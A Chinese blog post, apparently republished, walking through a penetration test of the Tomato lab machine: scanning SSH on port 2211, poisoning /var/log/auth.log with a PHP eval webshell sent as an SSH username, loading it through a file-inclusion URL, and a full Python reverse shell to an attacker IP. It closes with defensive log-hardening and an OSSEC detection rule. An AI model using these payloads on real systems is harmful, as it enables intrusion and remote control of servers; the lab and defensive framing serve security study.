别只盯着80端口:Tomato靶机渗透中那些容易被忽略的‘边路’突破口(2211端口与日志审计)
别只盯着80端口Tomato靶机渗透中那些容易被忽略的‘边路’突破口在渗透测试的世界里80端口就像是一扇大门吸引着大多数攻击者的目光。但真正的安全专家知道真正的突破口往往藏在那些不起眼的角落。就像在Tomato靶机渗透中2211端口的SSH服务和/var/log/auth.log日志文件这些看似无害的系统组件却可能成为攻陷整个系统的关键。1. 非常规入口点的侦察与发现1.1 全面端口扫描的艺术大多数初级渗透测试者会满足于默认的nmap扫描但这往往只能发现21、80、443等常见端口。要发现像2211这样的非常规SSH端口我们需要更深入的扫描策略nmap -A -p- 192.168.47.140 -T4这个命令的关键参数-A启用操作系统检测、版本检测、脚本扫描和跟踪路由-p-扫描所有65535个端口-T4设置扫描速度为激进模式提示在实际环境中全端口扫描会产生大量网络流量可能触发IDS/IPS警报建议根据情况调整-T参数。1.2 服务指纹识别的精妙之处发现2211端口后我们需要确定它运行的是什么服务。仅仅知道是SSH还不够我们需要了解具体的版本和配置nc -nv 192.168.47.140 2211 SSH-2.0-OpenSSH_7.9p1 Debian-10这个信息告诉我们OpenSSH版本7.9p1基于Debian系统可能存在的已知漏洞2. 日志文件作为攻击向量的深入分析2.1 auth.log的利用原理/var/log/auth.log记录了所有认证相关的活动包括SSH登录尝试。当SSH客户端发送畸形的用户名时这个用户名会被记录到auth.log中。如果我们能让Web应用包含这个日志文件就可能执行我们注入的代码。两种主要的利用方式对比方法蚁剑连接Python反弹Shell隐蔽性较低持续连接容易被发现较高连接后可立即断开复杂度简单图形化操作需要编写Python代码适用场景需要持久化访问时需要快速获取交互式shell时2.2 其他潜在可利用的日志文件除了auth.log渗透测试者还应该关注/var/log/apache2/access.log记录Web访问信息可注入恶意User-Agent/var/log/syslog系统主日志可能包含敏感信息/var/log/mail.log邮件日志可能泄露用户凭证3. 两种利用技术的深度对比3.1 蚁剑连接方法的技术细节使用蚁剑连接的完整流程通过SSH注入PHP代码ssh ?php eval($_POST[cmd]);?192.168.47.140 -p 2211验证代码是否成功写入curl http://192.168.47.140/antibot_image/antibots/info.php?image/var/log/auth.log使用蚁剑连接密码为cmd注意这种方法会在日志中留下明显的PHP代码痕迹容易被日志监控系统发现。3.2 Python反弹Shell的技术实现Python反弹Shell的完整代码解析import socket,subprocess,os ssocket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((192.168.47.129,4444)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) psubprocess.call([/bin/sh,-i])这段代码的关键点创建TCP套接字连接到攻击机将标准输入、输出和错误重定向到套接字生成交互式shell4. 防御视角的日志审计策略4.1 日志文件的安全配置为了防止此类攻击系统管理员应采取以下措施设置适当的日志文件权限chmod 640 /var/log/auth.log chown root:adm /var/log/auth.log配置logrotate定期轮转日志/etc/logrotate.d/rsyslog4.2 实时日志监控方案实施有效的日志监控策略使用Fail2Ban阻止异常SSH尝试apt install fail2ban systemctl enable --now fail2ban配置OSSEC进行实时日志分析/var/ossec/bin/ossec-control start设置自定义规则检测PHP代码注入rule id100101 level10 matchphp/match descriptionPossible PHP code injection in auth.log/description /rule在实际渗透测试项目中我发现很多企业虽然部署了昂贵的防火墙和IDS系统却往往忽略了最基本的日志安全配置。有一次在红队演练中正是通过一个配置不当的syslog文件我们成功获取了内网域管理员的凭证。这提醒我们在安全防御中细节决定成败。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2440447.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!